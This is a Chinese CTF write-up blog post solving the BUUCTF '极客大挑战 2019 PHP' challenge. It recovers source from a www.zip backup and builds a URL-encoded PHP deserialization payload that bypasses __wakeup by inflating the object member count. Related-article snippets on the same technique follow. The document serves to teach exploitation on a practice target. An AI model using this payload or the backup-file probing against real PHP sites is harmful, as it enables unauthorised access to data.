PHP反序列化-BUUCTF-[极客大挑战 2019]PHP&__wakeup绕过

已于 2023-01-03 15:26:43 修改
阅读量720 收藏 1
点赞数 1
分类专栏: CTF刷题记录 文章标签: php web安全 安全
于 2022-11-27 23:05:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53912233/article/details/128069937
版权

题目链接地址:
https://buuoj.cn/challenges#[极客大挑战%202019]PHP

信息收集

根据题目的提示,那么可以考虑是否存在源码备份的压缩包
在这里插入图片描述
我尝试一下在网站末尾加上/www.zip,没想到成功的下载到了这个网站的备份源码
在这里插入图片描述
在这里插入图片描述

源码分析

解压zip后,查看一下主页文件index.php,在这段代码可以看见index.php文件包含class.php文件,并且接收传参的值为select,unserialize函数为反序列化,说明了这一题需要用到反序列化的知识点。

在这里插入图片描述

我们跑去class.php文件看看

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

我们分析以下代码,当password为100,且username为admin才能输出flag值。
在这里插入图片描述

解题

那么我们为了反序列化就必须先序列化刚刚相对应的Name对象和它的成员值的信息,最后将序列化的结果放入主页的select传参值进行反序列化然后才能获得flag值

<?php
class Name {
    private $username  = '';
    private $password  = '';
    
    public function __construct($username,$password){
        $this ->username = $username;
        $this ->password = $password;
    }
}

$a = new Name('admin','100');
echo serialize($a)."<br>";
echo urlencode(serialize($a));

通过以上代码的编写,运行至本地php服务或者php在线运行。至于url编码反序列化值是由于在php中 private 为(私有成员):成员变量名字前需要加%00类名%00导致在正常显示中字符是看不见的,所以要使用url编码,才能序列化结果的完整性
在这里插入图片描述

__wakeup绕过

当执行反序列化时将会调用此 __wakeup( )魔术方法,导致了username的值变为guest
在这里插入图片描述
在php版本5.6.25之前, php7.0.10之前,如果在反序列化时,如果表示对象的成员数目的值大于原来的的数目就会跳过__wakeup( )的执行。按F12键看见PHP版本有__wakeup的绕过条件刚好可以利用,尝试构建payload
在这里插入图片描述
在这里插入图片描述

所以我们只需要提交payload的时候把成员数目值的2改为3就能轻松的绕过了__wakeup()魔术方法的调用

payload=

?select=O%3A4%3A"Name"%3A3%3A%7Bs%3A14%3A"%00Name%00username"%3Bs%3A5%3A"admin"%3Bs%3A14%3A"%00Name%00password"%3Bs%3A3%3A"100"%3B%7D

提交payload,成功回显flag值
在这里插入图片描述

cike_y
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1083
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
序列化一个类_php的类的序列化脚本_
09-30
- `__wakeup()`:在反序列化后被调用,通常用于重新初始化对象的状态,尤其是那些不能序列化的属性或资源。 ```php class MyClass { private $var1; private $resource; // 假设这是一个不能序列化的资源 ...
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3628
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
PHP反序列化中如何绕过_wakeup()函数的一些技巧
m0_63138919的博客
08-28 1209
本文为魔术方法_wakeup()的一些绕过用法
渗透测试-PHP反序列化绕过
cdyunaq的博客
04-26 4375
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 4904
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
详解php反序列化
12-17
PHP反序列化是一种将之前通过序列化保存的字符串还原成原始数据结构的技术。在PHP中,`serialize()`函数用于将变量转化为可存储或传输的字符串形式,而`unserialize()`函数则相反,它将字符串还原为原来的变量。这两...
var-exporter:VarExporter组件允许将任何可序列化PHP数据结构导出为纯PHP代码。 这样做时,它保留了与PHP的序列化机制(__wakeup,__ sleep,Serializable)相关的所有语义。
02-05
虽然这样做,它保留了与PHP的序列化机制(相关联的所有语义__wakeup , __sleep , Serializable , __serialize , __unserialize )。 它还提供了一个实例化器,该实例化器允许创建和填充对象而无需调用其构造...
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
在CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
PHP中的序列化和反序列化
09-18
此外,对于对象的序列化,PHP会在反序列化时调用对象的`__wakeup()`魔术方法,以便对象可以恢复其可能在序列化过程中丢失的状态,如重新建立数据库连接等。 总结来说,PHP的序列化和反序列化是数据持久化和交换的...
PHP反序列化小做
qq_74020399的博客
05-18 165
绕过方法:在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。原理:_wakeup()函数若不绕过则会将马上就要反序列化的字串中file给你替换为index,这样就会导致页面回到当前页面。在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数。wakeup():反序列化之前检查执行的函数,不论如何都会优先执行wakeup()方法。
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2116
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
__wakeup()绕过
v2ish1yan的博客
04-23 6596
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数 如xctf-unserialize3 只要序列化的中的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
php反序列化-BUUCTF刷题记录
cike_y
11-30 833
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
__wakeup()魔术方法绕过(CVE-2016-7124)
weixin_74985952的博客
08-14 184
php反序列化数据过程中,如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行。
PHP反序列化漏洞
weixin_51339377的博客
04-04 519
1.普通的序列化和相应的反序列化代码操作 2.反序列化漏洞利用1 参数个数错误从而wakeup函数不会被调用 一般防火墙都在wakeup函数这里 这样也就实现了绕过 改变量的个数 会跳过wakeup 但是仍然会执行 但是改变量长度和值的长度 wakeup也不会执行 但是对象已经不正常了 当反序列化变量的个数不对,那么__wakeup就不会执行 直接执行了__destruct 所以可以夹带私货 一般网站牵扯到大型数据的传输 有时候就可以通过post或者get直接执行恶意语句 举例:防..
BUUCTF [极客挑战 2019]HardSQL
m0_63253040的博客
03-28 2398
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
buuctf-[极客挑战 2019]BuyFlag-个人理解
sunquan705的博客
11-11 1339
buuctf-[极客挑战 2019]BuyFlag-个人理解-有错的还请师傅们指出
Secret File
weixin_46580614的博客
07-16 155
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
[极客挑战 2019]PHP 1
最新发布
09-28
可以通过CVE-2016-7124漏洞来绕过wakeup函数,只要把表示数量的字段改成比实际字段大的值即可绕过。 2. __construct():在对象被创建之前调用的初始化方法,但在unserialize()时不会自动调用。 3. __destruct():在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值